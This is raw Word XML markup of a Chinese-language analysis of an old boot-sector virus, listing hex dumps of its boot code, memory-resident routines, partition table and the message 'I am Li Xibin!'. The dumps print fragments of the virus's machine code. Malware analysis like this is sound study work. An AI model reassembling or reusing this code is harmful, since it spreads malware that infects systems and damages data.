      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="F"/>
          <w:attr w:name="SourceValue" w:val="10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10  F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">8 </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="F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02 F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">8 8B 05 FE C6 </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="a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3A</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>-75 02 72 04 B6 00 FE C5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 xml:space="preserve">0000:7D20  2B F0 73 E1 </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="C"/>
          <w:attr w:name="SourceValue" w:val="3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03 C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">6 B4 02-CD 13 </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="a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8A</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 6D FD 8B DD C7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 xml:space="preserve">0000:7D30  06 48 01 70 00 </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="C"/>
          <w:attr w:name="SourceValue" w:val="33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33 C</w:t>
        </w:r>
      </w:smartTag>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="a"/>
          <w:attr w:name="SourceValue" w:val="0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0 A</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">2-0B 00 8E D8 B0 </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="a"/>
          <w:attr w:name="SourceValue" w:val="52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52 A</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">3 </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="C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4C</w:t>
        </w:r>
      </w:smartTag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 xml:space="preserve">0000:7D40  00 </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="C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8C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0E 4E 00 EA 00 00-70 00 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r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>、辅助模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a"/>
        </w:smartTagPr>
        <w:r w:rsidRPr="00F35590">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>014A</w:t>
        </w:r>
      </w:smartTag>
    </w:p>
    <w:p w:rsidR="006D66C3" w:rsidRPr="00F35590" w:rsidRDefault="006D66C3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ind w:firstLineChars="2050" w:firstLine="3690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>BB FF FF B0 B6 E6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 xml:space="preserve">0000:7D50  43 89 D8 E6 42 88 E0 E6-42 E4 61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C"/>
        </w:smartTagPr>
        <w:r w:rsidRPr="00F35590">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>0C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 03 E6 61 4B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 xml:space="preserve">0000:7D60  B9 64 00 E2 FE EB EA 5B-C3 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r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>、辅助模块</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0169</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D66C3" w:rsidRPr="00F35590" w:rsidRDefault="006D66C3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ind w:firstLineChars="1900" w:firstLine="3420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>53 51 52 06 56 57 0E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 xml:space="preserve">0000:7D70 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F"/>
        </w:smartTagPr>
        <w:r w:rsidRPr="00F35590">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>1F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0E 07 BB 00 02 B9 01-00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2"/>
          <w:attr w:name="UnitName" w:val="F"/>
        </w:smartTagPr>
        <w:r w:rsidRPr="00F35590">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>32 F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">6 B8 01 02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C"/>
        </w:smartTagPr>
        <w:r w:rsidRPr="00F35590">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>9C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> FF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 xml:space="preserve">0000:7D80  1E 07 00 72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2"/>
          <w:attr w:name="UnitName" w:val="C"/>
        </w:smartTagPr>
        <w:r w:rsidRPr="00F35590">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>22 C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>7 07 E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"/>
          <w:attr w:name="UnitName" w:val="C"/>
        </w:smartTagPr>
        <w:r w:rsidRPr="00F35590">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>-1C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 80 FA 80 75 04 88 16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>0000:7D90  0B 02 FC B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9"/>
          <w:attr w:name="UnitName" w:val="a"/>
        </w:smartTagPr>
        <w:r w:rsidRPr="00F35590">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>9 A</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">0 01 BE 1E-00 BF 1E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F"/>
        </w:smartTagPr>
        <w:r w:rsidRPr="00F35590">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>02 F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a"/>
        </w:smartTagPr>
        <w:r w:rsidRPr="00F35590">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>3 A</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4 B8 01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lastRenderedPageBreak/>
        <w:t xml:space="preserve">0000:7DA0  03 41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C"/>
        </w:smartTagPr>
        <w:r w:rsidRPr="00F35590">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>9C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> FF 1E 07 00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F"/>
        </w:smartTagPr>
        <w:r w:rsidRPr="00F35590">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>5F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">-5E 07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a"/>
        </w:smartTagPr>
        <w:r w:rsidRPr="00F35590">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>5A</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 59 5B C3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r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>、病毒提示信息</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>“I am Li Xibin!”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D66C3" w:rsidRPr="00F35590" w:rsidRDefault="006D66C3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ind w:firstLineChars="2650" w:firstLine="4770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>20 49                  I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 xml:space="preserve">0000:7DB0  20 61 6D 20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C"/>
        </w:smartTagPr>
        <w:r w:rsidRPr="00F35590">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>4C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 69 20 58-69 62 69 6E 21 0D         am Li Xibin!.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宋体" w:hAnsi="宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>、分区表数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D66C3" w:rsidRPr="00F35590" w:rsidRDefault="006D66C3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ind w:firstLineChars="2650" w:firstLine="4770"/>
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pP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a"/>
        </w:smartTagPr>
        <w:r w:rsidRPr="00F35590">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>0A</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 00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>0000:7DC0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00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>0000:7DD0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00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>0000:7DE0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00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 xml:space="preserve">0000:7DF0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 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宋体" w:hAnsi="宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>、系统扇区标志值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D66C3" w:rsidRPr="00F35590" w:rsidRDefault="006D66C3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ind w:firstLineChars="2650" w:firstLine="4770"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>55 AA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D66C3" w:rsidRDefault="006D66C3" w:rsidP="006D66C3"/>
    <w:p w:rsidR="006D66C3" w:rsidRPr="006D66C3" w:rsidRDefault="006D66C3" w:rsidP="006D66C3">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D66C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>二、病毒常驻内存后数据分析</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D66C3" w:rsidRDefault="006D66C3" w:rsidP="006D66C3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>9F80</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为病毒常驻内存的地址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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>、病毒跳转指令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F"/>
        </w:smartTagPr>
        <w:r w:rsidRPr="00F35590">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>9F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">80:0000  EB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C"/>
        </w:smartTagPr>
        <w:r w:rsidRPr="00F35590">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>1C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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宋体" w:hAnsi="宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>BPB</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>及病毒数据区</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D66C3" w:rsidRPr="00F35590" w:rsidRDefault="006D66C3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ind w:firstLineChars="850" w:firstLine="1530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 xml:space="preserve">90 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4B</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 49 44 </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="C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4C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>20-20 20 20</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>00</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 02 01 01 00     .KIDL    .....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smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="F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9F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">80:0010  02 E0 00 28 0B F0 09 00-12 00 02 00 00 00 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宋体" w:hAnsi="宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>、病毒自举主程序</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D66C3" w:rsidRPr="00F35590" w:rsidRDefault="006D66C3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ind w:firstLineChars="2650" w:firstLine="4770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>FA 33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smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="F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9F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>80:</w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="C"/>
          <w:attr w:name="SourceValue" w:val="20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0020  C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">0 8E D8 8E D0 BC 00 </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="C"/>
          <w:attr w:name="SourceValue" w:val="7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7C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">-8B F4 FB C4 06 </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="C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4C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="a"/>
          <w:attr w:name="SourceValue" w:val="0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00 A</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3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smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="F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9F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">80:0030  07 </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="C"/>
          <w:attr w:name="SourceValue" w:val="7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7C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="C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8C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 06 09 </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="C"/>
          <w:attr w:name="SourceValue" w:val="7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7C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> A1 13-04 48 48 B1 </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="a"/>
          <w:attr w:name="SourceValue" w:val="6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06 A</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3 13 04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smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="F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9F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>80:0040  D3 E0 8E C0 B9 00 02 33-FF FC F</w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="a"/>
